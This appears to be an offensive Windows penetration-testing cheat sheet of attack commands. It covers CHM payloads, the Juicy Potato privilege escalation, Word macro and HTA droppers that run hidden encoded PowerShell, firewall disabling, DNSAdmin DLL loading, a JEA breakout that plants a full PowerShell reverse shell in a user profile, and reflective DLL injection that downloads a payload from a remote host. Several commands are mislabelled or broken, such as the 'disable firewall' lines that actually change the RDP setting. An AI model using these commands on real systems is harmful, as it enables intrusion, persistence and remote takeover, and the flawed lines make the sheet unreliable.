Comment on page



Use a Windows VM, install the required tools from here, then get the scricpt Out-CHM.ps1 and create your payload:
Out-CHM -Payload C:\Windows\System32\spool\drivers\color\nc.exe -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Juicy Potato

Metasploit (Details)

use windows/local/ms16_075_reflection_juicy`
set SESSION <>
set CLSID <>
Common CLSIDs for the exploit are:
  • {e60687f7-01a1-40aa-86ac-db1cbf673334}
  • {752073A1-23F2-4396-85F0-8FDB879ED0ED}
  • {3c6859ce-230b-48a4-be6c-932c0c202048}
  • {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
  • {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
  • More can be found here

Word Macro

Simple Word Macro (View > Macros, at the end "File->Information->Check For Issues" to purge personal details), save as .doc:
Sub DoStuff()
Dim wsh As Object
Set wsh = CreateObject("WScript.Shell")
wsh.Run "<powershell command here>"
Set wsh = Nothing
End Sub
Sub AutoOpen()
End Sub
Alternativly we can use HTA:
<script language="VBScript">
Function DoStuff()
Dim wsh
Set wsh = CreateObject("Wscript.Shell") "powershell -Sta -Nop -Window Hidden -EncodedCommand <blah>"
Set wsh = Nothing
End Function

Building and Signing MSIs

Use wix to generate msi files from xml or to manipulate existing msi files. A complete example can be seen in the Ethereal Writeup

Windows Firewall

List rules

netsh advfirewall firewall show rule name=all

Disable Firewall on Windows 7 via cmd

Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable Firewall on Windows 7 via Powershell

powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`

Disable Firewall on any windows via cmd

netsh Advfirewall set allprofiles state off

Load DLL from System32

Windows 10


To run commands with runas, the user has to have logged in at least once.


Elevate Privileges by loading a custom DLL as DNSAdmin

# requires RSAT
dnscmd <dc> /config /serverlevelplugindll \\<ip>\<dll>
# requires RSAT
$dnssettings = Get-DnsServerSetting -ComputerName <dc> -Verbose
$dnssettings.ServerLevelPluginDll = "\\<ip>\<dll>"
Set-DnsServerSetting -InputObject $dnssettings -ComputerName <dc> -Verbose
Then restart the service:
sc.exe stop dns
sc.exe start dns

DNS Enumeration/Exploitation Tools

Bypass JEA

When in constrained language mode (or more):

Read File:
Write File:
${C:\file.txt} = 'content'
Break out by writing a powershell profile (executed whenever powershell is started by this user):
${C:\users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1} = '$client = New-Object System.Net.Sockets.TCPClient("<ip>",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
Via Script Blocks:
& { ls }
Custom function:
PS>function xct { ls };
These vulnerabilities exist only in Constrained Language Mode, usually with JEA "NoLanguage" is to be used.

RCE via Cab Files

Reflectivly load DLL into explorer.exe

String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://<ip>/payload.dll');(New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";

Dump Sticky Note Contents